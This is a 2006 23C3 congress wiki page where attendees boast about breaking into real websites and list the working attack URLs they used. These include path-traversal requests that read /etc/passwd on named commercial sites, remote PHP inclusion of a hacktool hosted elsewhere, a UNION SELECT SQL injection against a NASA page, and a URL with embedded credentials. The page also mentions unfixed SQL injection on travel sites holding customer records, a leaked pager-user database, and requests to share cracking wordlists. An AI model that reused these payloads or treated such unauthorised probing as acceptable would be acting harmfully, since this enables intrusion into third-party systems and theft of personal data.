Hacks
From 23C3 Public Wiki
bad hacks
Remember: No harm to the network!
lol
My work just nullrouted some scriptkiddies :P
CTV Hacks - powered by !eof
Someone else "hacked" it, too. Dunno who it was. --codec
Why is changing a user-definable text a hack? lamers! :-) --PoCSascha
Since you are involved! (next time I change the password!) :-D --BugBlue
POC hacks - powered by !eof
- fixed: The Asterisk server of POC doesn't check the external incoming numbers, but puts a 0 in front. If you put 1 zero in front of the local number (0110), the system will change it (not really sure) to 00110 and will later on (maybe at the Alcatel hardware) strip the 2 0's. This means it will display a local call number.
- maybe fixed: The G5 computer of POC has/had a username test with password test.
- not tested: When abusing the Asterisk server from POC, they will block you at MAC address level. If you abuse it from outside, it will block the router.
Travel cluster
Various, uh... tour operators with a slight problem with session IDs. Furthermore, an IIS 5 on a Windows 2000 is not exactly the best idea... how did it go? webservices on iis are like russian roulette with a glock? Whatever... almost every form on the sites goes unfiltered to the MS SQL DB. Well... an MS SQL DB with the data of ALL the people who have travelled with the respective operators since the site was created... would be something nice... Oh, and in the profiles on the sites you can build in JavaScript etc. JUST FINE.
Oh, and they KNOW about the flaws... since, uh... April.
Favourites:
rufadmin: 'the site is secure anyway'
'head admin' of all the sites: 'I know about the flaws, but they don't want to pay enough to have them fixed.'
http://www.frosch-sportreisen.de/
But my favourite is still http://www.ruf.de/index.html... especially... since I know that their admin is called Uwe... well... surely nobody has been testing a private site on the company server...
NOC hacks - powered by !eof
The printers from the NOC helpdesks didn't have any password in the configuration. This is 'fixed'.
some other hacks
http://hannes:fnord2342@sputnik.congress.ccc.de - Sputnik RFID tracking ;-)
http://prosieben.de/club_community/community/index.php?commFile=/foren/channel.php&kat_id='
http://sharp.de/suche/suche.php?search_string=%27
https://wi.hexonet.net/wi/54cd/include.php?http://foobar.servegame.com/ (note: httpS)
Interesting: This domain hoster is housing JURIS, the German database of law and order :) Funny: It delivers our content with its own certificate (remote PHP inclusion is potentially possible)
Jamba! http://www.jamba.de/jcw/search/searchContent.do?&keywords=&displayname=Gruesse%20vom%2023C3!%20:-)
Even Google! http://www.google.de/search?hl=de&q=Gruesse+vom+23C3
there is a small gallery @flickr ... http://www.flickr.com/photos/75149036@N00/
default password on ssl-vpn: the complete network was open until now. the users can work without problems. the new password was emailed to the admin.
https://www.storage-station.com/
btw. i hope this is ok for the ethik hotline which was not reachable.
Bla? ;)
(both "fixed" by now)
http://www.microsoft.se/23C3
http://www.microsoft.dk/23C3
Blub? ;)
http://ich.will-ficken.info http://www.sage.edu/current/handbook/sca/handbook.php?page=http://events.ccc.de/congress/2006/ there is more ...
Webklabauter PHP Hacktool remote inclusion :) http://www.sage.edu/current/handbook/sca/handbook.php?page=http://events.ccc.de/congress/2006/images/4/4d/Wkb2.gif&wkb=1# check out: http://metalab.at/wiki/Webklabauter
hostmaster@1und1.com, please fix the next 2:
http://www.vgf-online.de/index.php?id=103&no_cache=1&dlpath=etc
http://www.browningteam-bayern.de/markt/Rollen/objekte/phpcksec.php?path=/proc/version
even more browsing fun:
http://www.witze-welt.de/index.php?page=../../../../../../../../../etc/passwd - very funny
Not having a shadow-file is a very bad idea :-/
http://www.ethik.uni-jena.de/02/index.php?file=../../../../../../../../etc/passwd
http://www.lufthansa-cargo.com/download.jsp?file=../../../../../../../../../../../../../../../../../../../../etc/passwd
ready to print directly: http://janine.homedns.org/printDutyRoster.php?file=/etc/passwd
downloading is more convenient: http://www.archis.ch/cgi-bin/wPermission.cgi?file=../../../../../../../../../../../../../../../../etc/passwd
http://climate.gsfc.nasa.gov/viewImage.php?id=-1%20UNION%20SELECT%200,0x32336333206f6e676f696e672e2e2e,2,0x3c696d67207372633d2268747470733a2f2f6576656e74732e636f6e67726573732e6363632e64652f636f6e67726573732f323030362d6d6564696177696b692f2f696d616765732f652f65632f323363335f3332307832343070785f32332e6a7067223e,4,5,6,7,8%20/**
Webcam:
Stuttgart Airport ?
http://195.243.185.195/view/index.shtml
oldschool
http://www.angelfire.com/funky/laneyards/ thinking of good old times ...
table bunny hack
realtime notification?
are you polling the Recent changes function for latest updates on this page and in the wiki? why not install a chat notification plug-in into the wiki, so we can hang out in an IRC channel or even jabber MUC and see in realtime when people edit stuff here? just a thought. --lynX
emessage.de / skyper user database
A SQLite DB with users of the German pager network Skyper / emessage has been seen on various FTP servers. Users can be searched here, the collected DB is e.g. here, if not, use the ftpsearch.
no hack just XSS :)
no hack just a strange checkPassword (having disabled javascript)
http://napoli.ipv6.telscom.ch/TelscomHomeEnvironment
need wordlist
need a wordlist (max. 5<8) characters. please answer here. many thanks.
md5: check [1]
sorry, not a md5 hash list, a normal wordlist with numbers etcpp.
look at http://packetstormsecurity.nl/Crackers/wordlists/ or wait ~5 mins and leech my wordlist from tigh.central-services.congress.ccc.de/test/need_wordlist_please/please/